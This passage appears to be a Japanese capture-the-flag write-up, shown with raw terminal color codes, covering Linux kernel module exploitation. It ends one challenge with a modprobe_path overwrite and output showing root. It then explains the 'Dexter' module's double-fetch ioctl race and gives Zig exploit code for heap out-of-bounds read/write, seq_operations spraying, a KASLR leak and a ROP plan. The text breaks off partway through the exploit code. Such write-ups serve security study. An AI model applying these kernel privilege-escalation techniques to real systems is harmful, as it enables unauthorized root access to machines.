�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaddr�[0m�[1m�[36m-�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37maaw�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"/tmp/x�[0m�[33m\x00�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37mmodprobePath�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37mwhoami�[0m
�[1m�[37m./exploit�[0m
�[1m�[37m/tmp/unknown �[0m�[1m�[37m&�[0m�[1m�[37m> /tmp/null�[0m
�[1m�[37mcat /tmp/whoisit�[0m
�[1m�[37mwhoami: unknown uid 1337�[0m
�[1m�[37m[INFO] Kernel base address: 0xffffffffb3400000�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なexploit
== �[1m�[4mDexter�[22m�[24m
課題情報
�[1m�[37m[*] './dexter/qemu/rootfs/root/dexter.ko'�[0m
�[1m�[37m Arch: amd64-64-little�[0m
�[1m�[37m RELRO: No RELRO�[0m
�[1m�[37m Stack: No canary found�[0m
�[1m�[37m NX: NX enabled�[0m
�[1m�[37m PIE: No PIE (0x0)�[0m
�[1m�[37m Stripped: No�[0m
�[1m�[37mSMEP enabled�[0m
�[1m�[37mSMAP enabled�[0m
�[1m�[37mKPTI enabled�[0m
�[1m�[37mKASLR enabled�[0m
�[40m`dexter.c`�[49mの脆弱性は�[40m�[35m`copy_data_from_user`�[39m�[49
mを2回を呼びること。
攻撃者は合法な�[40m�[35m`request_t`�[39m�[49mで�[40m�[35m`ioctl`�[39m�[4
9mをする。
そして�[40m�[35m`verify_request`�[39m�[49mの実行直後、合法な�[40m�[35m`reque
st_t`�[39m�[49mと悪質な�[40m�[35m`request_t`�[39m�[49mを取り替えると、ヒープOOB
読み取り/書き込みはできる。
ならばこうしよう:
1. �[40m`/dev/dexter`�[49mを開けると�[40m�[35m`filp-
>private_data`�[39m�[49mを確保する
2. �[40m�[35m`seq_operations`�[39m�[49mをスプレーする
3. �[40m�[35m`filp-
>private_data`�[39m�[49mに隣接する�[40m�[35m`seq_operations.start`
�[39m�[49m関数ポインターを上書きする
SMAPが無効果されているならそれだけでいい。しかし、それじゃつまらないだろう。
まずKASLRを倒す: �[40m�[35m`shm_file_data`�[39m�[49m(もひとりのkernel-
32構造体)の�[40m�[35m`ns`�[39m�[49mフィールドの値はカネールのベスアドレスからの固定オフセットだ。
さて、どこでROPchainを置くてかね。
システムコールを実行する時にユーザ空間のレジスータはカネールのスタックに保存している。
それぞれのガジェットのアドレスをレジスタに格納すれば、カネールが親切にROPchainをスタクに置くてやる。
ギリギリだが�[40m�[35m`modprobe_path`�[39m�[49mを書き換えるROPchainは納めできる。
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mdexter_ioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33menum�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mGET�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xdec50001�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mSET�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xdec50002�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mrequest_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mptr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mseq_operations�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstart�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstop�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mnext�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mshow�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mshm_file_data�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mns�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfile�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mvm_ops�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mpin�[0m�[1m�[36m-�[0m�[1m�[37mto�[0m�[1m�[36m-�[0m�[1m�[37mcore�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mraceIoctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mop�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mdexter_ioctl�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mreq�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mrequest_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mrace_is_won�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[36mbool�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// read what's currently in filp->private_data.�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mdexter_ioctl�[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mrequest_t�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mptr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m8�[0m�[1m�[37m �[0m�[1m�[37m}))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mpd_sentinel�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m8�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mpd_sentinel�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33minline�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mi�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m^=�[0m�[1m�[37m �[0m�[1m�[36m0xff�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mouter�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mtrue�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mreq�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mrequest_t�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mptr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37myield�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37merr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mop�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[37mreq�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mop�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// if we succeeded in reading, pd_vanguard is in the start of buf�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mpd_sentinel�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mouter�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// if we succeeded in writing, pd_vanguard should no longer be the start of buf�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSET�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m8�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mdexter_ioctl�[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mrequest_t�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mptr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mtmp�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m8�[0m�[1m�[37m �[0m�[1m�[37m}))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m!�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mpd_sentinel�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mouter�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mINVAL�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mcontinue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Won the race"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mrace_is_won�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mraceCorrupt�[0m�[1m�[37m(�[0m�[1m�[37mdst�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mrequest_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mare_we_there_yet�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[36mbool�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m!�[0m�[1m�[37mare_we_there_yet�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37msleep�[0m�[1m�[37m(�[0m�[1m�[36m2�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdst�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37moverwrite�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mgetCpuCount�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m>�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m>=�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mreq�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mrequest_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mrace_is_won�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt1�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mraceIoctl�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mreq�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mrace_is_won�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt2�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mraceCorrupt�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m&�[0m�[1m�[37mreq�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mrace_is_won�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt1�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt2�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt1�[0m�[1m�[37m.�[0m�[37mjoin�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt2�[0m�[1m�[37m.�[0m�[37mjoin�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37moverread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mgetCpuCount�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m>�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m>=�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mreq�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mrequest_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mrace_is_won�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
